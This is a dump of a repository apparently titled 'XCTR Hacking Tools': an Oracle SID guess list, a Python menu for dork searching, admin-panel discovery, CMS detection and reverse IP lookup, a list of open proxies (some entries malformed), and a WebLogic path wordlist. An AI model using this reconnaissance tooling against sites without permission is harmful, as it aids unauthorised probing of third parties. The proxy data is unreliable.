KRAUS 147 | KRONOS 148 | LDAP 149 | LINUX101 150 | LINUX1011 151 | LINUX1012 152 | LINUX1013 153 | LINUX1014 154 | LINUX102 155 | LINUX1021 156 | LINUX817 157 | LINUX8171 158 | LINUX8172 159 | LINUX8173 160 | LINUX8174 161 | LINUX901 162 | LINUX902 163 | LINUX9021 164 | LINUX9022 165 | LINUX9023 166 | LINUX9024 167 | LINUX9025 168 | LINUX9026 169 | LINUX9027 170 | LUN 171 | MDTEST 172 | MYDB 173 | NEDB 174 | NORTHWIND 175 | ODB 176 | OGDP 177 | OID 178 | OJS 179 | OMS 180 | ORA1 181 | ORA10 182 | ORA101 183 | ORA10101 184 | ORA10101P 185 | ORA10101T 186 | ORA10102 187 | ORA10102P 188 | ORA10102T 189 | ORA10103 190 | ORA10103P 191 | ORA10103T 192 | ORA10104 193 | ORA10104P 194 | ORA10104T 195 | ORA10105 196 | ORA10105P 197 | ORA10105T 198 | ORA1011 199 | ORA1011P 200 | ORA1011T 201 | ORA1012 202 | ORA1012P 203 | ORA1012T 204 | ORA1013 205 | ORA1013P 206 | ORA1013T 207 | ORA1014 208 | ORA1014P 209 | ORA1014T 210 | ORA1015 211 | ORA1015P 212 | ORA1015T 213 | ORA1021 214 | ORA1021P 215 | ORA1021T 216 | ORA1022 217 | ORA1022P 218 | ORA1022T 219 | ORA2 220 | ORA8 221 | ORA805 222 | ORA806 223 | ORA815 224 | ORA816 225 | ORA817 226 | ORA8170 227 | ORA8170P 228 | ORA8170T 229 | ORA8171 230 | ORA8171P 231 | ORA8171T 232 | ORA8172 233 | ORA8172P 234 | ORA8172T 235 | ORA8173 236 | ORA8173P 237 | ORA8173T 238 | ORA8174 239 | ORA8174P 240 | ORA8174T 241 | ORA8_SC 242 | ORA910 243 | ORA920 244 | ORA9201 245 | ORA9201P 246 | ORA9201T 247 | ORA9202 248 | ORA9202P 249 | ORA9202T 250 | ORA9203 251 | ORA9203P 252 | ORA9203T 253 | ORA9204 254 | ORA9204P 255 | ORA9204T 256 | ORA9205 257 | ORA9205P 258 | ORA9205T 259 | ORA9206 260 | ORA9206P 261 | ORA9206T 262 | ORA9207 263 | ORA9207P 264 | ORA9207T 265 | ORACL 266 | ORACLE 267 | ORADB 268 | ORADB1 269 | ORADB2 270 | ORADB3 271 | ORALIN 272 | ORCL0 273 | ORCL1 274 | ORCL10 275 | ORCL2 276 | ORCL3 277 | ORCL4 278 | ORCL5 279 | ORCL6 280 | ORCL7 281 | ORCL8 282 | ORCL9 283 | ORCLA 284 | ORCLB 285 | ORCLC 286 | ORCLD 287 | ORCLE 288 | ORCLF 289 | ORCLG 290 | ORCLH 291 | ORCLI 292 | ORCLJ 293 | ORCLK 294 | ORCLL 295 | ORCLM 296 | ORCLN 297 | ORCLO 298 | ORCLP 299 | ORCLP0 300 | ORCLP1 301 | ORCLP2 302 | ORCLP3 303 | ORCLP4 304 | ORCLP5 305 | ORCLP6 306 | ORCLP7 307 | ORCLP8 308 | ORCLP9 309 | ORCLQ 310 | ORCLR 311 | ORCLS 312 | ORCLSOL 313 | ORCLT 314 | ORCLU 315 | ORCLV 316 | ORCLW 317 | ORCLX 318 | ORCLY 319 | ORCLZ 320 | ORIONDB 321 | ORTD 322 | P 323 | P10 324 | P10G 325 | P8 326 | P8I 327 | P9 328 | P9I 329 | PD1 330 | PINDB 331 | PORA10101 332 | PORA10102 333 | PORA10103 334 | PORA10104 335 | PORA10105 336 | PORA1011 337 | PORA1012 338 | PORA1013 339 | PORA1014 340 | PORA1015 341 | PORA1021 342 | PORA1022 343 | PORA8170 344 | PORA8171 345 | PORA8172 346 | PORA8173 347 | PORA8174 348 | PORA9201 349 | PORA9202 350 | PORA9203 351 | PORA9204 352 | PORA9205 353 | PORA9206 354 | PORA9207 355 | PRD 356 | PRITXI 357 | PROD 358 | PROD0 359 | PROD1 360 | PROD10G 361 | PROD2 362 | PROD3 363 | PROD4 364 | PROD5 365 | PROD6 366 | PROD7 367 | PROD8 368 | PROD8I 369 | PROD9 370 | PROD920 371 | PROD9I 372 | PROG10 373 | RAB1 374 | RAC 375 | RAC1 376 | RAC2 377 | RAC3 378 | RAC4 379 | RECV 380 | REP 381 | REP0 382 | REP1 383 | REP2 384 | REP3 385 | REP4 386 | REP5 387 | REP6 388 | REP7 389 | REP8 390 | REP9 391 | REPO 392 | REPO0 393 | REPO1 394 | REPO2 395 | REPO3 396 | REPO4 397 | REPO5 398 | REPO6 399 | REPO7 400 | REPO8 401 | REPO9 402 | REPOS 403 | REPOS0 404 | REPOS1 405 | REPOS2 406 | REPOS3 407 | REPOS4 408 | REPOS5 409 | REPOS6 410 | REPOS7 411 | REPOS8 412 | REPOS9 413 | RIPPROD 414 | RITCTL 415 | RITDEV 416 | RITPROD 417 | RITQA 418 | RITTRN 419 | RITTST 420 | SALES 421 | SAMPLE 422 | SANIPSP 423 | SAP 424 | SAP0 425 | SAP1 426 | SAP2 427 | SAP3 428 | SAP4 429 | SAP5 430 | SAP6 431 | SAP7 432 | SAP8 433 | SAP9 434 | SAPHR 435 | SGNT 436 | SID0 437 | SID1 438 | SID2 439 | SID3 440 | SID4 441 | SID5 442 | SID6 443 | SID7 444 | SID8 445 | SID9 446 | STAG1 447 | STAG2 448 | T1 449 | T10 450 | T101 451 | T102 452 | T2 453 | T3 454 | T4 455 | T7 456 | T71 457 | T72 458 | T73 459 | T8 460 | T80 461 | T81 462 | T82 463 | T9 464 | T91 465 | T92 466 | TEST 467 | TEST10G 468 | THUMPER 469 | TRC28 470 | TRIUMF 471 | TSH1 472 | TST 473 | TST0 474 | TST1 475 | TST2 476 | TST3 477 | TST4 478 | TST5 479 | TST6 480 | TST7 481 | TST8 482 | TST9 483 | TYCP 484 | UNIX101 485 | UNIX1011 486 | UNIX1012 487 | UNIX1013 488 | UNIX1014 489 | UNIX102 490 | UNIX1021 491 | UNIX817 492 | UNIX8171 493 | UNIX8172 494 | UNIX8173 495 | UNIX8174 496 | UNIX901 497 | UNIX902 498 | UNIX9021 499 | UNIX9022 500 | UNIX9023 501 | UNIX9024 502 | UNIX9025 503 | UNIX9026 504 | UNIX9027 505 | VENOM 506 | VENU 507 | VISTA 508 | W101 509 | W1011 510 | W1012 511 | W1013 512 | W1014 513 | W102 514 | W1021 515 | W817 516 | W8171 517 | W8172 518 | W8173 519 | W8174 520 | W901 521 | W902 522 | W9021 523 | W9022 524 | W9023 525 | W9024 526 | W9025 527 | W9026 528 | W9027 529 | WG73 530 | WIN101 531 | WIN1011 532 | WIN1012 533 | WIN1013 534 | WIN1014 535 | WIN102 536 | WIN1021 537 | WIN817 538 | WIN8171 539 | WIN8172 540 | WIN8173 541 | WIN8174 542 | WIN901 543 | WIN902 544 | WIN9021 545 | WIN9022 546 | WIN9023 547 | WIN9024 548 | WIN9025 549 | WIN9026 550 | WIN9027 551 | WINDOWS101 552 | WINDOWS1011 553 | WINDOWS1012 554 | WINDOWS1013 555 | WINDOWS1014 556 | WINDOWS102 557 | WINDOWS1021 558 | WINDOWS817 559 | WINDOWS8171 560 | WINDOWS8172 561 | WINDOWS8173 562 | WINDOWS8174 563 | WINDOWS901 564 | WINDOWS902 565 | WINDOWS9021 566 | WINDOWS9022 567 | WINDOWS9023 568 | WINDOWS9024 569 | WINDOWS9025 570 | WINDOWS9026 571 | WINDOWS9027 572 | XEXDB 573 | XE_XPT 574 | CLRExtProc 575 | hsagent 576 | 577 | -------------------------------------------------------------------------------- /xctr.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import func 3 | import configparser 4 | from time import sleep 5 | 6 | class colors: 7 | CGREY = '\33[90m' 8 | CRED2 = '\33[91m' 9 | CGREEN2 = '\33[92m' 10 | CYELLOW2 = '\33[93m' 11 | CBLUE2 = '\33[94m' 12 | CVIOLET2 = '\33[95m' 13 | CBEIGE2 = '\33[96m' 14 | CWHITE2 = '\33[97m' 15 | HEADER = '\033[95m' 16 | OKBLUE = '\033[94m' 17 | OKGREEN = '\033[92m' 18 | WARNING = '\033[93m' 19 | FAIL = '\033[91m' 20 | ENDC = '\033[0m' 21 | BOLD = '\033[1m' 22 | UNDERLINE = '\033[4m' 23 | 24 | 25 | def Giris(): 26 | x = """ 27 | 28 | `8.`8888. ,8' ,o888888o.8888888 8888888888 8 888888888o. 29 | `8.`8888. ,8' 8888 `88. 8 8888 8 8888 `88. 30 | `8.`8888. ,8',8 8888 `8. 8 8888 8 8888 `88 31 | `8.`8888.,8' 88 8888 8 8888 8 8888 ,88 32 | `8.`88888' 88 8888 8 8888 8 8888. ,88' 33 | .88.`8888. 88 8888 8 8888 8 888888888P' 34 | .8'`8.`8888. 88 8888 8 8888 8 8888`8b 35 | .8' `8.`8888.`8 8888 .8' 8 8888 8 8888 `8b. 36 | .8' `8.`8888. 8888 ,88' 8 8888 8 8888 `8b. 37 | .8' `8.`8888. `8888888P' 8 8888 8 8888 `88. 38 | \n""" 39 | 40 | for c in x: 41 | print(colors.CYELLOW2 + c, end='') 42 | sys.stdout.flush() 43 | sleep(0.0025) 44 | y = "֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎\n\n" 45 | for c in y: 46 | print(colors.CRED2 + c, end='') 47 | sys.stdout.flush() 48 | sleep(0.0045) 49 | y = "֎֎ 𝗖𝗔𝗣𝗧𝗨𝗥𝗘 𝗧𝗢𝗢𝗟𝗦 ֎֎\n\n" 50 | for c in y: 51 | print(colors.CWHITE2 + c, end='') 52 | sys.stdout.flush() 53 | sleep(0.0045) 54 | x = "֎֎ 𝐈𝐍𝐒𝐓𝐀𝐆𝐑𝐀𝐌==>𝐜𝐚𝐩𝐭𝐮𝐫𝐞𝐭𝐡𝐞𝐫𝐨𝐨𝐭 ֎֎\n\n" 55 | for c in x: 56 | print(colors.CWHITE2 + c, end='') 57 | sys.stdout.flush() 58 | sleep(0.0045) 59 | z = "֎֎ 𝐂𝐨𝐝𝐞𝐝 𝐁𝐲 ==>𝐇𝐔𝐋𝐘𝐀 𝐊𝐀𝐑𝐀𝐁𝐀𝐆 ֎֎\n\n" 60 | for c in z: 61 | print(colors.CWHITE2 + c, end='') 62 | sys.stdout.flush() 63 | sleep(0.0045) 64 | h = "֎֎ 𝐂𝐨𝐝𝐞𝐝 𝐁𝐲 ==>𝐌𝐄𝐑𝐓 𝐁𝐄𝐘𝐎𝐆𝐋𝐔 ֎֎\n\n" 65 | for c in h: 66 | print(colors.CWHITE2 + c, end='') 67 | sys.stdout.flush() 68 | sleep(0.0045) 69 | y = "֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎֎\n\n" 70 | for c in y: 71 | print(colors.CRED2 + c, end='') 72 | sys.stdout.flush() 73 | sleep(0.0045) 74 | 75 | 76 | def settings_menu(): 77 | print(""" 78 | {}{}{}Settings{} 79 | Download 80 | \t 1- User Agent 81 | \t 2- Up-to-Date Proxy 82 | 83 | Change 84 | \t 3- Site url 85 | \t 4- Site port 86 | \t 5- Number of threads(max:500) 87 | \t 6- Current wordlist 88 | \t 7- Project name 89 | """.format(colors.BOLD, colors.OKBLUE, colors.UNDERLINE, colors.ENDC)) 90 | 91 | choose = input("\nb- Back\nSettings | Choose\t: ") 92 | if choose == "1": 93 | func.Configuration.download("useragent") 94 | elif choose == "2": 95 | func.Configuration.download("proxy") 96 | elif choose == "3": 97 | func.Configuration.setUrl() 98 | elif choose == "4": 99 | func.Configuration.setPort() 100 | elif choose == "5": 101 | func.Configuration.setThreadNum() 102 | elif choose == "6": 103 | func.Configuration.selectWordlist() 104 | elif choose == "7": 105 | func.Configuration.isDirectoryExist() 106 | elif choose == "b": 107 | pass 108 | else: 109 | print("Try again...") 110 | sleep(1) 111 | 112 | 113 | def dorkMenu(): 114 | print(""" 115 | {}{}{}Dork Finder{} 116 | 1-) Bing dork finder 117 | 2-) Yandex dork finder 118 | """.format(colors.BOLD,colors.OKBLUE, colors.UNDERLINE, colors.ENDC)) 119 | answer = input("\nb- Back\nDork menu | Choose:") 120 | if answer == "1": 121 | func.Tools.bingDorkFinder() 122 | elif answer == "2": 123 | func.Tools.yandexDorkFinder() 124 | elif answer == "b": 125 | pass 126 | else: 127 | print("Wrong choose try again..") 128 | sleep(1) 129 | 130 | 131 | def adminMenu(): 132 | wconf = configparser.ConfigParser() 133 | wconf.read('settings.cfg') 134 | print(""" 135 | {}{}{}Admin Panel Finder{} 136 | Current wordlist: [{}] 137 | 138 | 1- Login 139 | 2- Change wordlist 140 | 3- Update proxies 141 | 142 | """.format(colors.BOLD,colors.OKBLUE, colors.UNDERLINE, colors.ENDC, wconf.get('general', 'cwordlist') 143 | )) 144 | answer = input("\nb- Back\nAdmin panel menu | Choose:") 145 | if answer.lower() == "1": 146 | func.Tools.adminFinder() 147 | elif answer.lower() == "2": 148 | func.Configuration.selectWordlist() 149 | elif answer.lower() == "3": 150 | func.Tools.proxyList() 151 | elif answer.lower() == "b": 152 | print("Turning back to the menu") 153 | sleep(1) 154 | pass 155 | else: 156 | print("Wrong choose. Try again..") 157 | sleep(1) 158 | 159 | 160 | def Menu(): 161 | print(colors.CBLUE2 + "<<<<<<<<<< 𝗪𝗘𝗟𝗖𝗢𝗠𝗘 𝗧𝗢 𝗫𝗖𝗧𝗥 𝗧𝗢𝗢𝗟𝗦 >>>>>>>>>>") 162 | y = """ 163 | 1) Dork Finder 164 | 2) Admin Panel Finder 165 | 3) Cms Finder 166 | 4) Ip History 167 | 5) Reverse Ip 168 | 6) Page Viewer 169 | 7) Proxy Finder 170 | 8) Read Me 171 | 9) Settings 172 | 0) EXIT 173 | """ 174 | for c in y: 175 | print(colors.CBEIGE2 + c, end='') 176 | sys.stdout.flush() 177 | sleep(0.0015) 178 | 179 | 180 | def welcomeScreen(): 181 | try: 182 | while True: 183 | selection = input("Main menu | Choose: ") 184 | if selection == "1": 185 | dorkMenu() 186 | elif selection == "2": 187 | adminMenu() 188 | elif selection == "3": 189 | func.Tools.cmsfinder() 190 | elif selection == "4": 191 | func.Tools.ipHistory() 192 | elif selection == "5": 193 | func.Tools.reverseIP() 194 | elif selection == "6": 195 | func.Tools.pageview() 196 | elif selection == "7": 197 | func.Tools.proxyList() 198 | elif selection == "8": 199 | print('Please visit the url:\n https://github.com/capture0x/XCTR-Hacking-Tools') 200 | sleep(4) 201 | elif selection == "9": 202 | settings_menu() 203 | elif selection == "0": 204 | print("Exiting...") 205 | sleep(1) 206 | print("bye-bye... (:") 207 | sys.exit(0) 208 | 209 | else: 210 | print("Try again") 211 | Menu() 212 | except Exception as err: 213 | print(err) 214 | pass 215 | 216 | 217 | if __name__ == "__main__": 218 | Giris() 219 | func.Configuration.isDirectoryExist() 220 | Menu() 221 | welcomeScreen() 222 | -------------------------------------------------------------------------------- /proxy.txt: -------------------------------------------------------------------------------- 1 | 187.41.153.133:8080 2 | 187.141.164.242:31120 3 | 150.242.34.191:53281 4 | 103.23.103.203:49497 5 | 154.117.176.102:23500 6 | 177.125.20.35:40744 7 | 43.248.24.157:51166 8 | 190.151.94.2:46615 9 | 185.136.150.201:54597 10 | 114.33.189.29:34275 11 | 91.203.236.226:48975 12 | 188.64.132.64:3127 13 | 195.69.204.18:3128 14 | 185.131.60.103:53281 15 | 91.206.210.54:46698 16 | 103.83.205.57:38992 17 | 125.99.120.166:40390 18 | 176.196.84.138:51336 19 | 94.74.158.76:8080 20 | 36.89.182.225:32917 21 | 125.209.116.234:39301 22 | 185.72.27.11:8080 23 | 190.103.178.8:8080 24 | 187.73.68.14:53281 25 | 151.237.175.183:8080 26 | 116.0.2.162:43927 27 | 41.160.252.116:53281 28 | 46.151.108.6:30874 29 | 95.68.115.202:53281 30 | 85.237.46.168:54328 31 | 109.201.9.99:8080 32 | 103.209.65.12:8080 33 | 42.115.88.12:46067 34 | 110.74.222.159:40348 35 | 172.91.68.243:8080 36 | 202.21.98.150:60640 37 | 45.227.156.105:50013 38 | 138.201.223.250:31288 39 | 79.104.25.218:8080 40 | 94.141.244.39:59823 41 | 45.234.200.18:53281 42 | 182.48.87.170:8080 43 | 85.52.217.114:52055 44 | 190.152.39.78:43548 45 | 113.53.91.12:53281 46 | 181.211.245.74:44267 47 | 190.152.223.2:37994 48 | 81.163.57.147:41258 49 | 202.136.88.58:38210 50 | 103.221.254.44:56471 51 | 217.23.69.146:8080 52 | 85.30.215.48:32946 53 | 187.62.191.3:61456 54 | 176.113.126.127:39921 55 | 177.91.111.233:8080 56 | 5.141.244.52:44087 57 | 138.197.135.71:8118 58 | 95.104.54.227:42119 59 | 148.251.200.194:1080 60 | 148.103.9.41:37584 61 | 148.251.200.198:1080 62 | 188.170.41.6:60332 63 | 120.29.155.59:60004 64 | 134.19.254.2:21231 65 | 194.183.168.129:31385 66 | 198.23.143.11:8080 67 | 103.86.187.242:23500 68 | 216.169.73.65:40344 69 | 176.103.173.97:40549 70 | 36.66.218.121:35004 71 | 216.198.188.26:51068 72 | 197.210.153.126:51616 73 | 185.175.95.46:49065 74 | 46.39.41.21:8080 75 | 185.95.184.4:8080 76 | 186.233.96.246:23500 77 | 196.14.52.63:35048 78 | 94.127.144.179:33905 79 | 103.50.154.4:48564 80 | 125.25.165.97:39021 81 | 37.204.20.170:8080 82 | 110.74.222.213:52733 83 | 202.63.104.89:54297 84 | 186.225.45.13:45974 85 | 186.42.186.202:48281 86 | 103.216.82.18:6666 87 | 103.106.119.170:46380 88 | 173.242.102.241:53603 89 | 213.109.6.85:37062 90 | 138.197.157.44:8080 91 | 139.59.53.107:3128 92 | 202.182.121.205:8080 93 | 139.59.99.234:8080 94 | 200.73.128.196:3128 95 | 197.159.12.167:59369 96 | 103.87.207.188:58444 97 | 138.197.157.32:8080 98 | 139.162.78.109:8080 99 | 139.59.99.63:3128 100 | 41.139.9.47:8080 101 | 194.110.141.136:8080 102 | 110.171.154.142:80 103 | 46.35.84.25:8080 104 | 171.6.73.236:8080 105 | 196.216.220.196:8080 106 | 165.227.114.142:3128 107 | 151.248.63.153:8080 108 | 167.99.80.225:8080 109 | 46.239.41.131:8080 110 | 103.78.181.161:8080 111 | 41.60.232.163:8080 112 | 64.227.1.188:8080 113 | 207.246.78.249:3128 114 | 191.242.161.152:8080 115 | 101.109.54.33:8080 116 | 36.90.122.18:8080 117 | 37.235.31.166:8080 118 | 117.254.60.207:8080 119 | 64.91.248.243:3128 120 | 86.57.179.4:8080 121 | 64.227.1.173:8080 122 | 113.53.58.251:8080 123 | 125.27.133.87:8080 124 | 37.113.233.247:8080 125 | 112.78.178.212:3128 126 | 183.88.197.81:8080 127 | 31.31.184.18:8080 128 | 113.161.196.196:8080 129 | 116.68.171.162:8080 130 | 182.253.171.64:3128 131 | 103.206.100.111:53281 132 | 125.165.184.226:8080 133 | 78.92.233.2:8080 134 | 202.182.113.140:3128 135 | 103.86.43.27:8080 136 | 157.245.71.188:8080 137 | 202.134.191.156:8080 138 | 182.253.168.129:8080 139 | 36.77.44.117:8080 140 | 109.200.162.84:8080 141 | 178.128.55.193:53281 142 | 202.93.229.98:8080 143 | 187.95.28.141:8080 144 | 185.26.33.208:8080 145 | 81.163.115.200:8080 146 | 110.78.141.176:8080 147 | 180.183.61.66:8080 148 | 36.68.110.25:3128 149 | 101.109.57.161:8080 150 | 41.60.238.203:8080 151 | 36.76.175.101:8080 152 | 124.158.175.2:8080 153 | 36.90.91.205:80 154 | 103.58.116.254:8080 155 | 128.199.180.178:8080 156 | 45.115.176.204:8080 157 | 101.51.171.183:8080 158 | 203.29.27.4:8080 159 | 156.155.2.66:8080 160 | 187.95.28.85:20183 161 | 41.59.222.216:8080 162 | 134.35.160.124:8080 163 | 36.73.15.16:8080 164 | 134.35.120.191:8080 165 | 222.124.50.87:3128 166 | 68.183.233.56:8888 167 | 151.80.135.147:3128 168 | 36.90.13.2:8080 169 | 186.229.25.18:8080 170 | 75.151.213.85:8080 171 | 203.19.92.3:80 172 | 93.88.107.125:34626 173 | 92.84.56.10:51275 174 | 85.10.219.96:1080 175 | 3.84.27.209:8080 176 | 142.93.208.168:3128 177 | 42.112.34.33:3433 178 | 188.120.209.97:53281 179 | 91.211.107.204:41258 180 | 202.182.48.86:57942 181 | 27.50.18.115:29836 182 | 195.154.81.58:8118 183 | 186.159.3.41:30334 184 | 117.212.88.147:58195 185 | 117.197.99.117:80 186 | 82.200.9.234:47284 187 | 202.166.205.78:58431 188 | 118.99.95.16:40059 189 | 41.190.95.20:56167 190 | 176.110.121.90:21776 191 | 177.93.97.104:33946 192 | 203.172.185.122:55482 193 | 178.62.195.140:8118 194 | 176.221.109.106:41180 195 | 5.59.141.152:61981 196 | 113.53.82.92:39726 197 | 46.165.49.41:52967 198 | 5.9.218.105:1080 199 | 209.97.132.215:8118 200 | 177.202.43.110:38012 201 | 138.68.8.149:8118 202 | 102.176.197.253:56580 203 | 67.205.177.112:3128 204 | 182.160.124.26:47304 205 | 212.28.237.130:32529 206 | 212.24.148.234:60494 207 | 191.241.226.230:53281 208 | 182.160.103.227:53281 209 | 142.93.138.69:8118 210 | 185.242.168.118:8080 211 | 5.53.16.202:3128 212 | 212.154.58.111:35116 213 | 207.154.231.216:3128 214 | 169.57.157.148:80 215 | 144.76.134.113:80 216 | 203.202.245.62:80 217 | 54.207.111.168:8080 218 | 177.99.206.82:8080 219 | 189.113.217.35:42517 220 | 94.130.20.85:31288 221 | 45.4.237.72:48546 222 | 80.78.75.59:38253 223 | 104.41.24.71:8080 224 | 190.97.209.74:60999 225 | 103.96.235.81:23500 226 | 103.28.121.58:80 227 | 49.12.12.79:8080 228 | 193.86.25.225:53875 229 | 200.116.198.148:53634 230 | 177.222.251.162:33834 231 | 27.147.136.178:47678 232 | 173.212.202.65:80 233 | 191.234.166.4:8080 234 | 181.168.206.106:38024 235 | 169.57.157.146:8123 236 | 192.144.105.200:8080 237 | 200.73.128.159:8080 238 | 163.47.158.21:40928 239 | 152.204.128.46:44335 240 | 181.129.52.158:54351 241 | 27.123.255.82:30029 242 | 181.143.79.154:48749 243 | 138.219.147.197:53281 244 | 144.76.134.115:80 245 | 207.154.231.211:3128 246 | 181.129.183.19:53281 247 | 154.16.202.22:8080 248 | 88.198.50.103:8080 249 | 5.9.202.164:1080 250 | 85.10.219.102:1080 251 | 5.9.218.107:1080 252 | 170.78.92.38:8080 253 | 186.146.2.111:60837 254 | 203.19.88.51:80 255 | 179.108.169.71:8080 256 | 200.89.178.230:8080 257 | 181.209.82.154:23500 258 | 148.251.200.193:1080 259 | 88.198.33.232:1080 260 | 186.250.29.1:53281 261 | 77.222.152.137:54710 262 | 118.175.207.183:42517 263 | 181.129.140.83:35232 264 | 181.198.97.241:30072 265 | 203.202.254.206:61456 266 | 103.247.216.114:8080 267 | 188.168.75.254:56899 268 | 92.247.142.14:53281 269 | 202.52.234.236:35931 270 | 181.114.63.129:8085 271 | 182.23.2.102:49833 272 | 89.40.48.186:8080 273 | 1.179.206.161:59033 274 | 36.89.182.211:48080 275 | 115.74.201.137:42108 276 | 138.121.32.26:23500 277 | 118.175.93.103:51750 278 | 77.58.96.177:80 279 | 93.78.238.94:41258 280 | 36.91.44.243:37927 281 | 43.229.74.134:23500 282 | 200.142.120.90:47860 283 | 58.162.229.173:51536 284 | 45.70.60.79:42656 285 | 89.42.133.58:8080 286 | 200.195.55.186:8080 287 | 27.68.135.14:30199 288 | 5.8.203.76:48026 289 | 103.8.40.129:48542 290 | 89.34.208.223:45168 291 | 136.228.128.164:53052 292 | 45.71.108.18:46114 293 | 49.0.1.44:8080 294 | 182.53.197.22:35126 295 | 50.197.38.230:60724 296 | 181.196.145.106:52241 297 | 160.119.129.42:53038 298 | 94.130.125.220:1080 299 | 103.251.57.23:60083 300 | 181.113.131.98:47961 301 | .74.208.154:21776 302 | 125.166.76.56:8080 303 | 202.70.82.253:23500 304 | 103.78.80.194:33442 305 | 188.73.8.12:36047 306 | 147.78.160.10:8080 307 | 177.92.67.230:53281 308 | 200.89.178.196:80 309 | 186.47.17.70:40437 310 | 197.210.153.126:51616 311 | 41.207.54.154:443 312 | 52.139.82.140:80 313 | 36.89.247.59:43011 314 | 5.135.181.83:80 315 | .32.34:8080 316 | 202.72.193.5:8080 317 | 0 318 | 187.95.28.228:8080 319 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/weblogic.txt: -------------------------------------------------------------------------------- 1 | * 2 | *.gif 3 | *.gif/ 4 | *.html 5 | *.jsp 6 | *.jsp/ 7 | *.jws 8 | *.portal 9 | *.portion 10 | *.portlet 11 | *.shtml/ 12 | Admin 13 | AdminCaptureRootCA 14 | AdminClients 15 | AdminConnections 16 | AdminEvents 17 | AdminJDBC 18 | AdminLicense 19 | AdminMain 20 | AdminProps 21 | AdminRealm 22 | AdminThreads 23 | AdminVersion 24 | BizTalkServer 25 | Bootstrap 26 | Certificate 27 | Classpath/ 28 | ConsoleHelp 29 | ConsoleHelp/ 30 | DefaultWebApp 31 | DeploymentService 32 | FileServlet 33 | HTTPClntClose 34 | HTTPClntClose/* 35 | HTTPClntLogin 36 | HTTPClntLogin/* 37 | #HTTPClntRecv 38 | HTTPClntRecv/* 39 | HTTPClntSend 40 | HTTPClntSend/* 41 | JspServlet 42 | LogfileSearch 43 | LogfileTail 44 | Login.jsp 45 | MANIFEST.MF 46 | META-INF 47 | Samples 48 | SamplesSearchWebApp 49 | Shutdown 50 | Shutdown/* 51 | SimpappServlet 52 | SimpleClientJws 53 | SimpleClientProviderImpl 54 | StockServlet 55 | T3AdminMain 56 | UniversityServlet 57 | WEB-INF 58 | WEB-INF./web.xml 59 | WEB-INF/web.xml 60 | WLDummyInitJVMIDs 61 | WebServiceServlet 62 | _async 63 | _async/* 64 | _async/AsyncResponseService 65 | _async/AsyncResponseServiceHttps 66 | _async/AsyncResponseServiceJms 67 | _async/AsyncResponseServiceSoap12 68 | _async/AsyncResponseServiceSoap12Https 69 | _async/AsyncResponseServiceSoap12Jms 70 | _tmp_war 71 | _tmp_war_DefaultWebApp 72 | a2e2gp2r2/* 73 | a2e2gp2r2/x.jsp 74 | accessor 75 | actions 76 | admin/login.do 77 | applet 78 | applications 79 | appmanager/* 80 | asyncServlet 81 | asyncServlet/main.jsp 82 | asyncServlet/receive 83 | asyncServlet/send 84 | authenticatedy 85 | bea-guardian-agent 86 | bea-guardian-agent/ 87 | bea-guardian-agent/DeployServlet 88 | bea-guardian-agent/test.jsp 89 | bea-guardian-agent/version 90 | bea_wls9_async_response 91 | bea_wls_async_response 92 | bea_wls_cluster_internal 93 | bea_wls_cluster_internal/0056FABC093BDF49C8AE091F74400598 94 | bea_wls_cluster_internal/a2e2gp2r2/* 95 | bea_wls_cluster_internal/psquare/* 96 | bea_wls_deployment_internal 97 | bea_wls_deployment_internal/* 98 | bea_wls_deployment_internal/DeploymentService 99 | bea_wls_diagnostics 100 | bea_wls_diagnostics/* 101 | bea_wls_diagnostics/accessor 102 | bea_wls_internal 103 | bea_wls_internal/ 104 | bea_wls_internal/* 105 | bea_wls_internal/HTTPClntClose 106 | bea_wls_internal/HTTPClntClose/* 107 | bea_wls_internal/HTTPClntLogin 108 | bea_wls_internal/HTTPClntLogin/* 109 | #bea_wls_internal/HTTPClntRecv 110 | #bea_wls_internal/HTTPClntRecv/* 111 | bea_wls_internal/HTTPClntSend 112 | bea_wls_internal/HTTPClntSend/* 113 | bea_wls_internal/WLDummyInitJVMIDs 114 | bea_wls_internal/WebServiceServlet 115 | bea_wls_internal/a2e2gp2r2/x.jsp 116 | bea_wls_internal/classes/ 117 | bea_wls_internal/classes/ 118 | bea_wls_internal/classes/* 119 | bea_wls_internal/classes/META-INF/MANIFEST.MF 120 | bea_wls_internal/com/* 121 | bea_wls_internal/getior 122 | bea_wls_internal/getior/* 123 | bea_wls_internal/iiop/ClientClose 124 | bea_wls_internal/iiop/ClientClose/* 125 | bea_wls_internal/iiop/ClientLogin 126 | bea_wls_internal/iiop/ClientLogin/* 127 | #bea_wls_internal/iiop/ClientRecv 128 | #bea_wls_internal/iiop/ClientRecv/* 129 | bea_wls_internal/iiop/ClientSend 130 | bea_wls_internal/iiop/ClientSend/* 131 | bea_wls_internal/psquare/x.jsp 132 | bea_wls_management_internal2 133 | bea_wls_management_internal2/Bootstrap 134 | bea_wls_management_internal2/wl_management 135 | bea_wls_remote_deployer 136 | beanManaged 137 | certificate 138 | classes 139 | classes/ 140 | classes/* 141 | classes/META-INF/MANIFEST.MF 142 | com 143 | com.acumenat.uddi.server.http.UDDIListenerServlet 144 | com.bea.guardian.agent.VersionServlet 145 | com.bea.guardian.agent.weblogic.DeployServlet 146 | com.bea.guardian.agent.weblogic.DispatchServlet 147 | com/* 148 | cometd/* 149 | common 150 | config 151 | console 152 | console-help 153 | console-help/doc/* 154 | console-help/doc/en-us/com/bea/wlserver/core/index.html 155 | console-help/help/* 156 | console-help/online_search/* 157 | console/login/LoginForm.jsp 158 | consoleapp 159 | consolehelp 160 | consolehelp/console-help.portal 161 | consolehelp/index.jsp 162 | cookies 163 | default 164 | docs 165 | docs/SamplesSearchServlet/* 166 | docs/core/index.html 167 | docs/index.html 168 | docs51 169 | domain 170 | drp-exports 171 | drp-publish 172 | dummy 173 | e2ePortalProject/Login.portal 174 | ejb 175 | ejb20BeanMged 176 | ejb20BeanMgedEar 177 | ejb20_beanManaged 178 | ejb30 179 | ejbSimpappServlet 180 | error 181 | examplesWebApp 182 | examplesWebApp/* 183 | examplesWebApp/ConnectorServlet 184 